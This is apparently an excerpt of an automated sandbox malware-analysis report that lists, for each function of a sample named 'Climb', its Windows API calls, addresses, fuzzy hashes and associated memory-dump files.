Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: ef123b067040f5412aad18d44f233ccc708aa2ca13ef835d83725bb62eb8a7ea
Instruction ID: b150eb6b19a3c1253edf45f5086d4ccfee39a415c5b97f49d7820c48c3c7fd27
Opcode Fuzzy Hash: ef123b067040f5412aad18d44f233ccc708aa2ca13ef835d83725bb62eb8a7ea
Instruction Fuzzy Hash: 68814B71A00109EFCB00DF94C884EEEB7B9FF89315F204559F516AB250DB75AE46CB60

Function 0050B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0050B10C
Process32FirstW.KERNEL32(00000000,?), ref: 0050B11A

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Process32NextW.KERNEL32(00000000,?), ref: 0050B1FC
CloseHandle.KERNEL32(00000000), ref: 0050B20B

Part of subcall function 0049E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,004C4D73,?), ref: 0049E395

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: a1530216eaa24b6f1a83d0b4c1fee980367ebc9e1a2e805bb075747ae27b43ef
Instruction ID: 4a3f84f1d20261dfe7e507fc24db6fee6c688d60815100cb1dee8ec06ce93b8f
Opcode Fuzzy Hash: a1530216eaa24b6f1a83d0b4c1fee980367ebc9e1a2e805bb075747ae27b43ef
Instruction Fuzzy Hash: E4516D71508301AFD710EF25C886A5FBBE8FF89758F40892EF58997291EB34D904CB96

Function 004C1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004C1840

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d7eaff6148656cfca379a8bc6ad493c158915da94b920f56f2542a019cd6e108
Instruction ID: 4a0071289521cec541111d45fc0a0a317333c6266841edb88046781269dad1af
Opcode Fuzzy Hash: d7eaff6148656cfca379a8bc6ad493c158915da94b920f56f2542a019cd6e108
Instruction Fuzzy Hash: F5412B39605100AADB617BBA8C45FBF36A4EF57734F24462FF414D62B3DA3D8802467A

Function 00502533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 0050255A
WSAGetLastError.WSOCK32 ref: 00502568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005025E7
WSAGetLastError.WSOCK32 ref: 005025F1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 01591c7c3a4811a39887f2a12f8e021c376533a424931cf8c78bb1f8482d60e3
Instruction ID: db7a775f9b9615c83bec66746d4cbbaf1d6219e8a82771a2ab4cd2eae37fb8d9
Opcode Fuzzy Hash: 01591c7c3a4811a39887f2a12f8e021c376533a424931cf8c78bb1f8482d60e3
Instruction Fuzzy Hash: 2A41E534A00200AFE720AF25C88AF2A3BE5AB14758F54C85DF9199F3D2D776ED41CB94

Function 00516CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00516D1A
ScreenToClient.USER32(?,?), ref: 00516D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00516DBA

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: bfb33e2658bbcbb91c1e904af8a9a2a8a134afa058e7a3c79f2b656ae449a923
Instruction ID: d144183457dc28da737b981e009b05960febab45371cc26add5b5198a161b343
Opcode Fuzzy Hash: bfb33e2658bbcbb91c1e904af8a9a2a8a134afa058e7a3c79f2b656ae449a923
Instruction Fuzzy Hash: A7510A74A00209AFDF24DF68D880AEE7BB6FF55361F208659F9159B290D730ED81DB90

Function 004BB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a912ea22b0ec1189f115c81498ed5d8af5422de68d45515b14d82bd4c73d009d
Instruction ID: 9853df4431cbbb3d9965f921ae131942a59767926407ae6f56fa68b41f1f945c
Opcode Fuzzy Hash: a912ea22b0ec1189f115c81498ed5d8af5422de68d45515b14d82bd4c73d009d
Instruction Fuzzy Hash: E941D471A00604AFD725BF79CC41BAABBA9EB88714F10852FF111DB291D7B9990187E4

Function 004F611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004F61C8
GetLastError.KERNEL32(?,00000000), ref: 004F61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004F6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004F623F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 8eb6ffedc8065e04e64fc7352a397a17b949f5f6b3e7fc99cd14532b57a1a1ba
Instruction ID: 3e8ba31eb03c819f1468279c492376b5c8af97546fb089b1d78141f12c3472af
Opcode Fuzzy Hash: 8eb6ffedc8065e04e64fc7352a397a17b949f5f6b3e7fc99cd14532b57a1a1ba
Instruction Fuzzy Hash: 3B415F35600610DFCB10EF16C545A6EB7F2EF99314B19888DE95AAB362CB38FC01DB95

Function 004EB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004EB473
SetKeyboardState.USER32(00000080), ref: 004EB48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004EB4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004EB54F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 480d15ad95cbe058bf62adfc58d0d765ddca3357191fd7a148916d636a5475d4
Instruction ID: f061caeb986c7f496d7c26c8b59f5168def62fdbabefb9c613580c10e30a3f44
Opcode Fuzzy Hash: 480d15ad95cbe058bf62adfc58d0d765ddca3357191fd7a148916d636a5475d4
Instruction Fuzzy Hash: F1317970A006986EFF31CB278C047FB7BB5EB54316F04821BE095562D2C37C994687EA

Function 004EB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 004EB5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 004EB5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 004EB63B
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 004EB68D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b0f0dbecf9b5bb52d13f89b5bde995160c668f013eb2713ecdb23f6f0a5ef245
Instruction ID: 8804a2b706608c089db67f77d3456fe5aef795f1cb822b1e1635e7db0406dfd7
Opcode Fuzzy Hash: b0f0dbecf9b5bb52d13f89b5bde995160c668f013eb2713ecdb23f6f0a5ef245
Instruction Fuzzy Hash: 4B312E309006885EFF308B3688057FB7775EB55316F04822BE085562D1C37C99569BDB

Function 005180AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 005180D4
GetWindowRect.USER32(?,?), ref: 0051814A
PtInRect.USER32(?,?,?), ref: 0051815A
MessageBeep.USER32(00000000), ref: 005181C6

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 1b9fd50ee6359f8c96f4c0be25cf52a2dacb4b13e31f3b3c7f7c70cc2e5e6979
Instruction ID: bde002eb6507a23c7c27e241a4a1830ebd1d5af9d522d0a7f994d79b1a66de0c
Opcode Fuzzy Hash: 1b9fd50ee6359f8c96f4c0be25cf52a2dacb4b13e31f3b3c7f7c70cc2e5e6979
Instruction Fuzzy Hash: 71418F32A41215EFEB21CF58C884AF97BF5BF55310F1484A8E9559B261CB30A8C6DB90

Function 00512176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00512187

Part of subcall function 004E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E43AD
Part of subcall function 004E4393: GetCurrentThreadId.KERNEL32 ref: 004E43B4
Part of subcall function 004E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004E2F00), ref: 004E43BB

GetCaretPos.USER32(?), ref: 0051219B
ClientToScreen.USER32(00000000,?), ref: 005121E8
GetForegroundWindow.USER32 ref: 005121EE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 3fe7649b8c6bf725c0294cdb435848300d00d1fadc92a40c895e8d6ab61b66f4
Instruction ID: ea1dd371e95c10496299d4c010d77dfc5f29bb3a39880cfdfa83be2a27924f7c
Opcode Fuzzy Hash: 3fe7649b8c6bf725c0294cdb435848300d00d1fadc92a40c895e8d6ab61b66f4
Instruction Fuzzy Hash: B0313075D00109AFD704EFAAC881CEEBBF8EF58308B50846EE515E7251E6759E45CBA0

Function 004EE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004841EA: _wcslen.LIBCMT ref: 004841EF

_wcslen.LIBCMT ref: 004EE8E2
_wcslen.LIBCMT ref: 004EE8F9
_wcslen.LIBCMT ref: 004EE924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 004EE92F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: d36e5b3ff8905239e4676d8a280eba774ebbde46bee4bae50aaba7e992987af1
Instruction ID: a68511751e2216a44a49853d6f68d8dd149a1e837c538d75063486ac8f7e5b87
Opcode Fuzzy Hash: d36e5b3ff8905239e4676d8a280eba774ebbde46bee4bae50aaba7e992987af1
Instruction Fuzzy Hash: F021CC71D00214AFCB10AFA6D981BEEB7F4EF56354F14405AE804BB341D6789E41C7A5

Function 0051321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 005132A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005132C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005132CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005132DC

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: eb32e38bbd8534a3ab704b246d02ce1dc5196fba1e9afcb0bb0aa93ae1fcf819
Instruction ID: 6825821e60b295d7ed08e708377e3876c3b362ecf7a49d3e009064eb8b5b3060
Opcode Fuzzy Hash: eb32e38bbd8534a3ab704b246d02ce1dc5196fba1e9afcb0bb0aa93ae1fcf819
Instruction Fuzzy Hash: E621B235204111AFE714AB24C855FAA7FA5FF91324F248658F8268B2D2C775ED81CBD0

Function 004E825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004E96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004E8271,?,000000FF,?,004E90BB,00000000,?,0000001C,?,?), ref: 004E96F3
Part of subcall function 004E96E4: lstrcpyW.KERNEL32(00000000,?,?,004E8271,?,000000FF,?,004E90BB,00000000,?,0000001C,?,?,00000000), ref: 004E9719
Part of subcall function 004E96E4: lstrcmpiW.KERNEL32(00000000,?,004E8271,?,000000FF,?,004E90BB,00000000,?,0000001C,?,?), ref: 004E974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004E90BB,00000000,?,0000001C,?,?,00000000), ref: 004E828A
lstrcpyW.KERNEL32(00000000,?,?,004E90BB,00000000,?,0000001C,?,?,00000000), ref: 004E82B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,004E90BB,00000000,?,0000001C,?,?,00000000), ref: 004E82EB

Strings

cdecl, xrefs: 004E82E2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b2a3823dc776305c5ec0593f9c05bdd8711eb4dd40c3998725e7ee90461b5be1
Instruction ID: c54af8e286d4d8a0f3340735efa8de6dc6fa0faf91d87cca34d6840907dbc1a0
Opcode Fuzzy Hash: b2a3823dc776305c5ec0593f9c05bdd8711eb4dd40c3998725e7ee90461b5be1
Instruction Fuzzy Hash: AE11063A200282ABCF155F36C844DBA77A9FF55755B10402FF906C7390EF369801D7A4

Function 005160FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 0051615A
_wcslen.LIBCMT ref: 0051616C
_wcslen.LIBCMT ref: 00516177
SendMessageW.USER32(?,00001002,00000000,?), ref: 005162B5

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 538d6d0370a35e6ae3484005f34b59128253e781e0f3e1dbd9e658c34ece908d
Instruction ID: fe6b0b70ac6ea6e0ff338bcc7b1046be1e7718de22325a808c1820f2b2763e54
Opcode Fuzzy Hash: 538d6d0370a35e6ae3484005f34b59128253e781e0f3e1dbd9e658c34ece908d
Instruction Fuzzy Hash: 4411B175540208AAEB20DFA58C84EEE7FBCFB61354F10452AFA15D6182E7B4C985DB60

Function 004B2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeeddb11f5a4016a0d39e98a76d50a2dd0d632aeed4351f6ed5d430071061485
Instruction ID: c1253fa4a5b35db00c36f3febf14ea2aa8e458f5c39ea51587d704715adf184c
Opcode Fuzzy Hash: aeeddb11f5a4016a0d39e98a76d50a2dd0d632aeed4351f6ed5d430071061485
Instruction Fuzzy Hash: 1601A2B26092167EF62136796DC0FE7671DDF513B8B304B2BB621A12D1DEA88C40D278

Function 004E2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 004E2394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004E23A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004E23BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004E23D7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5f4ae54503d6aa2602f45e75209ba81cfed4847ca8a48313da2f3ec8297f573a
Instruction ID: 6bb4846ffd41f7cd7e2e27b6ab60356b489064e3574cb60673e824b82868b118
Opcode Fuzzy Hash: 5f4ae54503d6aa2602f45e75209ba81cfed4847ca8a48313da2f3ec8297f573a
Instruction Fuzzy Hash: 3011093A900218FFEF119BA5CD85F9EBB78FB08750F200096EA01B7290D7B56E11DB94

Function 004EEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004EEB14
MessageBoxW.USER32(?,?,?,?), ref: 004EEB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004EEB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004EEB64

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 6c5ed07c6794547db32ac313af98af763441be33433b5438d074a984a5e73396
Instruction ID: 3d19f1338b34b96445befeb6c770fdbe8804a6218a9aa453ab3003e135857a17
Opcode Fuzzy Hash: 6c5ed07c6794547db32ac313af98af763441be33433b5438d074a984a5e73396
Instruction Fuzzy Hash: 90110872D00258BFC7019FAA9C05ADB7FBCAB56311F118656F815D3290D67899089770

Function 004AD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,004AD369,00000000,00000004,00000000), ref: 004AD588
GetLastError.KERNEL32 ref: 004AD594
__dosmaperr.LIBCMT ref: 004AD59B
ResumeThread.KERNEL32(00000000), ref: 004AD5B9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
